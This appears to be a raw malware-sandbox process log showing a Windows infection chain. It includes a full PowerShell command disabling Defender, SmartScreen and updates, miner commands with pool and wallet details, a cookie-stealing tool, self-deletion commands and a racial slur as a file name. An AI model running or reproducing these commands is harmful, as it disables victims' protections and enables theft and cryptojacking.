C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\64456638077.exe"C:\Users\Admin\AppData\Local\Temp\{FWmK-yjAqw-0avB-lTn5P}\64456638077.exe" /mix16⤵PID:7640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "FmtFsKQsUtdQpmgnYpAmzm4V.exe" /f & erase "C:\Users\Admin\Documents\FmtFsKQsUtdQpmgnYpAmzm4V.exe" & exit15⤵PID:5972
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "FmtFsKQsUtdQpmgnYpAmzm4V.exe" /f16⤵
- Kills process with taskkill
PID:7096
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"14⤵PID:4776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\06548636125.exe"15⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\06548636125.exe"C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\06548636125.exe"16⤵PID:7016
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 06548636125.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\06548636125.exe" & del C:\ProgramData\*.dll & exit17⤵PID:5780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 06548636125.exe /f18⤵
- Kills process with taskkill
PID:6808
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:5692
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\67517465602.exe" /mix15⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\67517465602.exe"C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\67517465602.exe" /mix16⤵PID:7576
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rsFgviDgpna & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{q751-bYwf9-JQnA-jIGAn}\67517465602.exe"17⤵PID:3284
-
C:\Windows\SysWOW64\timeout.exetimeout 318⤵
- Delays execution with timeout.exe
PID:4240
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nigger.exe" /f & erase "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe" & exit15⤵PID:6664
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nigger.exe" /f16⤵
- Kills process with taskkill
PID:7952
-
-
-
-
-
C:\Users\Admin\Documents\wyM7DGXKOwJL3PMfCEC9eWZg.exe"C:\Users\Admin\Documents\wyM7DGXKOwJL3PMfCEC9eWZg.exe"13⤵PID:4200
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{KTyg-kma0D-lPFv-fdw6K}\87440709168.exe"14⤵PID:6240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{KTyg-kma0D-lPFv-fdw6K}\19974607891.exe" /mix14⤵PID:6912
-
C:\Users\Admin\AppData\Local\Temp\{KTyg-kma0D-lPFv-fdw6K}\19974607891.exe"C:\Users\Admin\AppData\Local\Temp\{KTyg-kma0D-lPFv-fdw6K}\19974607891.exe" /mix15⤵PID:3600
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\ihQOIIuQ & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{KTyg-kma0D-lPFv-fdw6K}\19974607891.exe"16⤵PID:5664
-
C:\Windows\SysWOW64\timeout.exetimeout 317⤵
- Delays execution with timeout.exe
PID:5784
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "wyM7DGXKOwJL3PMfCEC9eWZg.exe" /f & erase "C:\Users\Admin\Documents\wyM7DGXKOwJL3PMfCEC9eWZg.exe" & exit14⤵PID:6148
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "wyM7DGXKOwJL3PMfCEC9eWZg.exe" /f15⤵
- Kills process with taskkill
PID:5620
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e0mjoqp0cub\olvumuzpbdl.exe"C:\Users\Admin\AppData\Local\Temp\e0mjoqp0cub\olvumuzpbdl.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1168 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "olvumuzpbdl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\e0mjoqp0cub\olvumuzpbdl.exe" & exit9⤵PID:6072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "olvumuzpbdl.exe" /f10⤵
- Kills process with taskkill
PID:2804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3tu4u2iojyf\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\3tu4u2iojyf\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\is-NAF1S.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-NAF1S.tmp\IBInstaller_97039.tmp" /SL5="$302B0,9884624,721408,C:\Users\Admin\AppData\Local\Temp\3tu4u2iojyf\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3024 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\is-4S46T.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-4S46T.tmp\{app}\chrome_proxy.exe"10⤵PID:2720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\i4i52ni5zv5\3sfqxkc4ktl.exe"C:\Users\Admin\AppData\Local\Temp\i4i52ni5zv5\3sfqxkc4ktl.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\i4i52ni5zv5\3sfqxkc4ktl.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\i4i52ni5zv5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616437203 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\2l5geii3obo\vpn.exe"C:\Users\Admin\AppData\Local\Temp\2l5geii3obo\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\iv2404vannw\app.exe"C:\Users\Admin\AppData\Local\Temp\iv2404vannw\app.exe" /8-238⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1180 -
C:\Program Files (x86)\Misty-River\7za.exe"C:\Program Files (x86)\Misty-River\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:2224
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Misty-River\app.exe" -map "C:\Program Files (x86)\Misty-River\WinmonProcessMonitor.sys""9⤵PID:5448
-
C:\Program Files (x86)\Misty-River\app.exe"C:\Program Files (x86)\Misty-River\app.exe" -map "C:\Program Files (x86)\Misty-River\WinmonProcessMonitor.sys"10⤵PID:5200
-
-
-
C:\Program Files (x86)\Misty-River\7za.exe"C:\Program Files (x86)\Misty-River\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:5152
-
-
C:\Program Files (x86)\Misty-River\app.exe"C:\Program Files (x86)\Misty-River\app.exe" /8-239⤵PID:3520
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9SC4IA2ERK\setups.exe"C:\Users\Admin\AppData\Local\Temp\9SC4IA2ERK\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Users\Admin\AppData\Local\Temp\is-RCT1H.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RCT1H.tmp\setups.tmp" /SL5="$4013A,383902,148480,C:\Users\Admin\AppData\Local\Temp\9SC4IA2ERK\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
PID:4292 -
C:\Users\Admin\AppData\Roaming\1A9D.tmp.exe"C:\Users\Admin\AppData\Roaming\1A9D.tmp.exe"5⤵PID:2212
-
C:\Users\Admin\AppData\Roaming\1A9D.tmp.exe"C:\Users\Admin\AppData\Roaming\1A9D.tmp.exe"6⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Roaming\22FB.tmp.exe"C:\Users\Admin\AppData\Roaming\22FB.tmp.exe"5⤵PID:4480
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\22FB.tmp.exe"6⤵PID:3928
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:2468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ddbbf0d..exe"C:\Users\Admin\AppData\Local\Temp\3ddbbf0d..exe"5⤵PID:5544
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:564
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:1384
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:5852
-
C:\ProgramData\3221668.exe"C:\ProgramData\3221668.exe"5⤵PID:4232
-
-
C:\ProgramData\7704317.exe"C:\ProgramData\7704317.exe"5⤵PID:4352
-
-
C:\ProgramData\7018372.exe"C:\ProgramData\7018372.exe"5⤵PID:5816
-
-
C:\ProgramData\5331449.exe"C:\ProgramData\5331449.exe"5⤵PID:2136
-
-
C:\ProgramData\5802237.exe"C:\ProgramData\5802237.exe"5⤵PID:3940
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5988
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3300
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1000
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
C:\Users\Admin\AppData\Local\Temp\is-9OTC7.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-9OTC7.tmp\vpn.tmp" /SL5="$10318,15170975,270336,C:\Users\Admin\AppData\Local\Temp\2l5geii3obo\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2700 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:4244
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:2124
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:4036
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:7692
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:6224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-River"1⤵PID:3108
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2756
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C1B766E643ECFC40E86C2E8E5122628A C2⤵PID:2944
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CDDAA11F6E4DA280345D3E7728A03E682⤵PID:5136
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:9060
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:9108
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4884
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5668
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\50308d22c2eb411cae4cfa3f148b2093 /t 3176 /p 28961⤵PID:5656
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\26a6f2d02768441cb6a4f977d0c67e4b /t 0 /p 48841⤵PID:5744
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\3229.tmp.exeC:\Users\Admin\AppData\Local\Temp\3229.tmp.exe2⤵PID:6688
-
-
C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"2⤵PID:8584
-
-
C:\Users\Admin\AppData\Local\Temp\9E80.tmp.exeC:\Users\Admin\AppData\Local\Temp\9E80.tmp.exe2⤵PID:8420
-
-
C:\Users\Admin\AppData\Local\Temp\C553.tmp.exeC:\Users\Admin\AppData\Local\Temp\C553.tmp.exe2⤵PID:6536
-
C:\Users\Admin\AppData\Local\Temp\C553.tmp.exe"C:\Users\Admin\AppData\Local\Temp\C553.tmp.exe"3⤵PID:9120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventOverride' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeShutdownErrs' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'AllOrNone' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeMicrosoftApps' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeWindowsApps' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Scan_ScheduleDay' -Value 8; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideScan_ScheduleTime' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableEnhancedNotifications' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableGenericRePorts' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideSpynetReporting' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SpynetReporting' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'SubmitSamplesConsent' -Value 2; $key='HKLM:\software\microsoft\Security Center';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AntiVirusDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'FirewallDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UpdatesDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UacDisableNotify' -Value 1; $key='HKLM:\software\Policies\Microsoft\MRT';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DontReportInfectionInformation' -Value 1; $key='HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose};New-ItemProperty -Path $key -Name 'DisableWindowsUpdateAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'SetDisableUXWUAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'DoNotConnectToWindowsUpdateInternetLocations' -Value 1 -Force -Verbose;New-ItemProperty -Path $key -Name 'DisableOSUpgrade' -Value 1 -Force -Verbose; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoAutoUpdate' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableFeaturedSoftware' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowFastServiceStartup' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ServiceKeepAlive' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PUAProtection' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MpEnablePus' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRealtimeMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBehaviorMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableIOAVProtection' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableOnAccessProtection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRawWriteNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableScanOnRealtimeEnable' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\System';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSmartScreen' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Features';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TamperProtection' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ProductStatus' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ManagedDefenderProductType' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRoutinelyTakingAction' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'OneTimeSqmDataSent' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ScanParameters' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ScheduleDay' -Value 8; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TaskbarNoNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HideSCAHealth' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SmartScreenEnabled' -Type String -Value 'Off'; Set-ItemProperty 'HKLM:\software\microsoft\windows\currentversion\Explorer' -Force 'DisableNotificationCenter' -Value 1; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue;4⤵PID:4900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; 